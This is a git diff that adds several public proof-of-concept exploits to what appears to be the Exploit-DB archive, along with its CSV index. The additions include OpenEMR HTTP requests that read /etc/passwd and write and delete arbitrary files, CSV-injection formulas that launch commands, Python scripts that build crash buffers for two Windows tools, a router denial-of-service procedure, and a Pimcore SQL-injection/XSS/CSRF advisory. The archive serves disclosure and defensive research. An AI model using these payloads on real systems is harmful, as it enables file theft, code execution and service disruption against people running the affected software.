diff --git a/exploits/hardware/dos/45203.txt b/exploits/hardware/dos/45203.txt new file mode 100644 index 000000000..690bf1a29 --- /dev/null +++ b/exploits/hardware/dos/45203.txt @@ -0,0 +1,20 @@ +# Exploit Title: TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC) +# Exploit Author: Aniket Dinda +# Date: 2018-08-05 +# Vendor Homepage: https://www.tp-link.com/ +# Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q +# Version: TP-Link Wireless N Router WR840N +# Firmware version : 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n +# Category: Hardware +# Tested on: Windows 10 +# CVE: CVE-2018-15172 + +# Proof Of Concept: + +1- First connect to this network +2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser. +3- Goto Quick setup > +4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string. +5- Now we paste a string consisting of 2000 zeros. +6- Then forward the connection +7- Then your router automatically logout and net connection will be gone. \ No newline at end of file diff --git a/exploits/linux/local/45205.txt b/exploits/linux/local/45205.txt new file mode 100644 index 000000000..3b1808b57 --- /dev/null +++ b/exploits/linux/local/45205.txt @@ -0,0 +1,58 @@ +# Exploit Title: WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC) +# Date: 2018-08-15 +# Exploit Author: PeregrineX +# Vendor Homepage: https://webkitgtk.org/ & https://webkit.org/wpe/ +# Software Link: https://webkitgtk.org/releases/ & https://wpewebkit.org/releases/ +# Version: <2.20.3 (GTK+) <2.20.1 (WPE) +# Tested on: WebKitGTK+ 2.20.2 +# CVE : CVE-2018-12293 + +# SUMMARY: +# getImageData() in ImageBufferCairo.cpp multiplies rect.width() * rect.height() * 4 +# without any overflow checks. If result is larger than UINT_MAX, +# heap-based buffer overflow via integer overflow will occur, +# which could be exploited further. + +# Works on WebKitGTK+ <2.20.3 and WPE WebKit <2.20.1 +# Credit to ADlab of Venustech for originally finding this vulnerability. + +Vulnerable Code (Source/WebCore/platform/graphics/cairo/ImageBufferCairo.cpp): + +template +RefPtr getImageData(const IntRect& rect, const IntRect& logicalRect, const ImageBufferData& data, const IntSize& size, const IntSize& logicalSize, float resolutionScale) +{ + auto result = Uint8ClampedArray::createUninitialized(rect.width() * rect.height() * 4); + if (!result) + return nullptr; +//... + +# Proof of Concept: + + + + + + No HTML5 canvas tag. + + + +# Output snippet +UBSAN output: +../Source/JavaScriptCore/runtime/JSGlobalObject.cpp:1608:22: runtime error: +call to function (unknown) through pointer to incorrect function type +'JSC::RuntimeFlags (*)(const JSC::JSGlobalObject *)' +(/usr/local/lib/libwebkit2gtk-4.0.so.37+0x11116c70): note: (unknown) defined here +SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior +../Source/JavaScriptCore/runtime/JSObject.h:695:17 in +DerivedSources/JavaScriptCore/KeywordLookup.h:469:13: runtime error: +load of misaligned address 0x7fd8a1d95062 for type 'const uint32_t' +(aka 'const unsigned int'), which requires 4 byte alignment +0x7fd8a1d95062: note: pointer points here + 00 00 28 66 75 6e 63 74 69 6f 6e 20 28 74 68 69 73 56 61 6c 75 65 2c 20 61 72 67 75 6d 65 6e 74 + ^ \ No newline at end of file diff --git a/exploits/linux/webapps/45167.txt b/exploits/linux/webapps/45167.txt index 3130d8233..b94bfe23c 100644 --- a/exploits/linux/webapps/45167.txt +++ b/exploits/linux/webapps/45167.txt @@ -2,7 +2,7 @@ # Shodon Dork: iPECS CM # Exploit Author: Safak Aslan # Software Link: www.ipecs.com -# Version: 30M (System) +# Version: 30M-B.2Ia and 30M-2.3Gn # Authentication Required: No # Tested on: Linux # CVE: N/A diff --git a/exploits/linux/webapps/45202.txt b/exploits/linux/webapps/45202.txt new file mode 100644 index 000000000..0f4ce3b39 --- /dev/null +++ b/exploits/linux/webapps/45202.txt @@ -0,0 +1,88 @@ +# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions +# Date: 2018-08-14 +# Exploit Author: Joshua Fam +# Twitter : @Insecurity +# Vendor Homepage: https://www.open-emr.org/ +# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz +# Version: < 5.0.1.3 +# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3 +# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140 + +# 1.Arbitrary File Read: +# In OpenEmr a user that has access to the portal can send a malcious +# POST request to read arbitrary files. + +# i.Vulnerable Code: +# if ($_POST['mode'] == 'get') { +# echo file_get_contents($_POST['docid']); +# exit; +# } + +# ii. Proof of Concept: +POST /openemr/portal/import_template.php HTTP/1.1 +Host: hostname +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 26 + +mode=get&docid=/etc/passwd + +# 2.Arbitrary File Write: +# In OpenEmr a user that has access to the portal can send a malcious +# POST request to write arbitrary files. + +# i. Vulnerable Code: +# } else if ($_POST['mode'] == 'save') { +# file_put_contents($_POST['docid'], $_POST['content']); +# exit(true); +# } + +# ii. Proof of Concept: +POST /openemr/portal/import_template.php HTTP/1.1 +Host: hostname +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 54 + +mode=save&docid=payload.php&content= + +# After sending this navigate to payload.php at http://hostname/openemr/portal + +# 3. Arbitrary File Delete: +# In OpenEmr a user that has access to the portal can send a malcious +# POST request to delete a arbitrary file. + +# i. Vulnerable Code: +# } else if ($_POST['mode'] == 'delete') { +# unlink($_POST['docid']); +# exit(true); +# } + +# ii. Proof of Concept: +POST /openemr/portal/import_template.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs +Connection: close +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 29 + +mode=delete&docid=payload.php + +# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page. \ No newline at end of file diff --git a/exploits/php/webapps/45206.txt b/exploits/php/webapps/45206.txt new file mode 100644 index 000000000..61af5dce0 --- /dev/null +++ b/exploits/php/webapps/45206.txt @@ -0,0 +1,34 @@ +# Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection +# Exploit Author: Javier Olmedo +# Website: https://hackpuntes.com +# Date: 2018-08-14 +# Google Dork: N/A +# Vendor: Matt Cromwell +# Software Link: https://wordpress.org/plugins/export-users-to-csv/ +# Affected Version: 1.1.1 and before +# Active installations: +20,000 +# Patched Version: unpatched +# Category: Web Application +# Platform: PHP +# Tested on: Win10x64 + +# 1. Plugin Description: +# WordPress Export Users to CSV plugin exports user data and meta data. +# You can even export the users by role and registration date range. + +# 2. Technical Description: +# WordPress Export users to CSV plugin version 1.1.1. and before are affected by Remote Code Execution +# through the CSV injection vulnerability. This allows an application user to inject commands as part +# of the fields of his profile and these commands are executed when a user with greater privilege +# exports the data in CSV and opens that file on his machine. + +# 3. Proof Of Concept (PoC): +# Enter the payload =SUM(1+1)*cmd|' /C calc'!A0 in any field of the profile, for example, in biography. +# When the user with high privileges logs in to the application, export data in CSV and opens the +# generated file, the command is executed and the calculator will run open on the machine. + +# 4. Payloads: +=SUM(1+1)*cmd|' /C calc'!A0 ++SUM(1+1)*cmd|' /C calc'!A0 +-SUM(1+1)*cmd|' /C calc'!A0 +@SUM(1+1)*cmd|' /C calc'!A0 \ No newline at end of file diff --git a/exploits/php/webapps/45208.txt b/exploits/php/webapps/45208.txt new file mode 100644 index 000000000..1d0f6fca0 --- /dev/null +++ b/exploits/php/webapps/45208.txt @@ -0,0 +1,215 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180813-0 > +======================================================================= + title: SQL Injection, XSS & CSRF vulnerabilities + product: Pimcore + vulnerable version: 5.2.3 and below + fixed version: 5.3.0 + CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059 + impact: High + homepage: https://pimcore.com/en + found: 2018-06-11 + by: T. Silpavarangkura (Office Bangkok) + N. Rai-Ngoen (Office Bangkok) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"Pimcore is an award-winning consolidated open source enterprise platform for +master data management (PIM/MDM), user experience management (CMS/UX), digital +asset management (DAM) and eCommerce." + +Source: https://pimcore.com/en + + +Business recommendation: +------------------------ +The vendor provides a patch for most identified issues, but XSS will not be fixed +according to the vendor. + +An in-depth security analysis performed by security professionals is highly +advised, as the software may be affected from further security issues. + + +Vulnerability overview/description: +----------------------------------- +1. SQL Injection (CVE-2018-14058) +Multiple SQL injection vulnerabilities have been identified in the REST web +service API. An attacker who obtains a valid API key that is granted a +necessary permission could successfully perform an attack to extract +information from the database. + +2. Stored Cross-site Scripting (CVE-2018-14059) +Multiple stored cross-site scripting vulnerabilities have been identified +across multiple functions in the application, which allows an authenticated +attacker to insert arbitrary JavaScript code in virtually all text fields and +data entries in the application. + +3. Cross-site Request Forgery (CVE-2018-14057) +Multiple functions in the application are not protected by the existing +anti-CSRF token, which allows an attacker to perform a cross-site request +forgery attack to at least add, update or delete entries, among other actions. + + +Proof of concept: +----------------- +1. SQL Injection (CVE-2018-14058) +The following URLs demonstrate the issue: +http:///webservice/rest/asset-count?apikey=[...]&condition= +http:///webservice/rest/asset-inquire?apikey=[...]&id= +http:///webservice/rest/asset-list?apikey=[...]&condition= +http:///webservice/rest/document-count?apikey=[...]&condition= +http:///webservice/rest/document-inquire?apikey=[...]&id= +http:///webservice/rest/document-list?apikey=[...]&condition= +http:///webservice/rest/object-count?apikey=[...]&condition= +http:///webservice/rest/object-inquire?apikey=[...]&id= +http:///webservice/rest/object-list?apikey=[...]&condition= + +Note that a valid API key that is granted at least either "Assets", "Documents" +or "Objects" permission is required to perform an SQL injection attack against +associated API endpoints successfully. + + +2. Stored Cross-site Scripting (CVE-2018-14059) +Most of the text fields in pop-up dialogs and data entries in the application +are vulnerable to the cross-site scripting vulnerability, which can be +exploited by an authenticated attacker. For example, the attacker could insert +an attack payload while performing at least the following actions: + +1) Edit a user account's first name/last name/e-mail address. +2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/ +Quantity Value/Static Routes entry value in the table. +3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/ +Field-Collections/Objectbrick/Classification Store item. + + +The vendor stated that many identified XSS issues only affect administrative +functions and hence the issues will not be fixed: +"They are only affecting administrative functionalities (higher privileges +required) - so this isn't used by non-trusted users - a check just adds +additional overhead without any benefits for security." + +SEC Consult argued multiple times that XSS can still be exploited e.g. when a +higher privileged user gets attacked and the issues should be fixed nevertheless. + + +3. Cross-site Request Forgery (CVE-2018-14057) +The existing anti-CSRF token in the HTTP request header named +"X-pimcore-csrf-token" was found to be validated only in the "Settings > +Users / Roles" function. Therefore, an attacker could perform a cross-site +request forgery attack against virtually all other functions in order to +at least add, update and delete data without having to submit the anti-CSRF +token. + +The non-exhaustive list of affected requests are listed below: +POST /admin/asset/add-asset +POST /admin/asset/add-asset-compatibility +GET /admin/asset/delete +GET /admin/asset/import-server +GET /admin/asset/import-server-files +GET /admin/asset/import-url +POST /admin/asset/import-zip +POST /admin/asset/update +GET /admin/document/add +GET /admin/document/delete +POST /admin/document/doc-types +POST /admin/email/blacklist +POST /admin/email/email-logs +POST /admin/email/save +POST /admin/hardlink/save +POST /admin/link/save +POST /admin/newsletter/save +GET /admin/object/add +POST /admin/object/save +GET /admin/object/delete +POST /admin/page/save +POST /admin/settings/metadata +POST /admin/settings/properties +POST /admin/settings/set-system +POST /admin/settings/website-settings +POST /admin/snippet/save + + +Vulnerable / tested versions: +----------------------------- +The vulnerabilities have been identified in Pimcore version 5.2.3 which was the +most current version at the time of discovery. + + +Vendor contact timeline: +------------------------ +2018-06-15: Contacting vendor through +https://pimcorehq.wufoo.com/forms/pimcore-security-report +2018-06-18: Vendor provides the fixes of SQL injection and CSRF in the nightly + build, but has a problem of reproducing the XSS. +2018-06-18: Contacting vendor to request for a secure channel to provide + further details of the XSS. +2018-06-18: Sending the details of the XSS. +2018-06-19: Vendor fixes the SQL injection and only fixes the XSS partially. +2018-06-20: Notifying vendor, that SQL injection and XSS are not properly fixed +2018-06-20: Vendor inquires more details about the XSS. +2018-06-21: Explaining vendor the XSS issues and notifying vendor that the CSRF + has been fixed. +2018-06-21: Vendor will discuss the open issues internally. +2018-07-11: Following up vendor regarding the fixes of the open issues. +2018-07-11: Vendor completely fixes the SQL injection, but decides not to fix + the XSS in the administrative functions, patch release is planned + within the next two weeks +2018-07-20: Vendor provides a patched version +2018-08-13: Public release of security advisory + + +Solution: +--------- +The vendor has published a new release (version 5.3.0) which fixes most of the +identified issues, but not the XSS issues that affect administrative functions: + +https://pimcore.com/en/download + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF Thongchai Silpavarangkura / @2018 \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45204.py b/exploits/windows_x86-64/dos/45204.py new file mode 100755 index 000000000..73960e85d --- /dev/null +++ b/exploits/windows_x86-64/dos/45204.py @@ -0,0 +1,26 @@ +# Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-08-16 +# Homepage: https://www.ambientweather.com +# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe +# Tested Version: 1.4.0.1 +# Tested on OS: Windows 10 + +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the program. Now click "Okay" and in the new window paste the content of +# "exploit.txt" into the following fields:"IP". Click "Search" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 2000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45207.py b/exploits/windows_x86-64/dos/45207.py new file mode 100755 index 000000000..6be674d62 --- /dev/null +++ b/exploits/windows_x86-64/dos/45207.py @@ -0,0 +1,25 @@ +# Exploit Title: Central Management Software v1.4.13 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-08-16 +# Homepage: https://www.ambientweather.com +# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/Manuals/ambientcam/04_central_management_software.zip +# Tested Version: 1.4.13 +# Tested on OS: Windows 10 +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt" just copy the text inside "exploit.txt" +# and start the CMS client program. In the new window paste the content of +# "exploit.txt" into the following fields:"Password". Click "Login" and you will see a crash. + +#!/usr/bin/python + +buffer = "A" * 2000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index c4f621de8..e6d2acaa1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6046,6 +6046,9 @@ id,file,description,date,author,type,platform,port 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware, 45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86, 45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware, +45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware, +45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64, +45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9873,6 +9876,7 @@ id,file,description,date,author,type,platform,port 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux, 45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android, 45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64, +45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39799,4 +39803,7 @@ id,file,description,date,author,type,platform,port 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux, 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848 45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001 +45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux, 45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware, +45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php, +45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80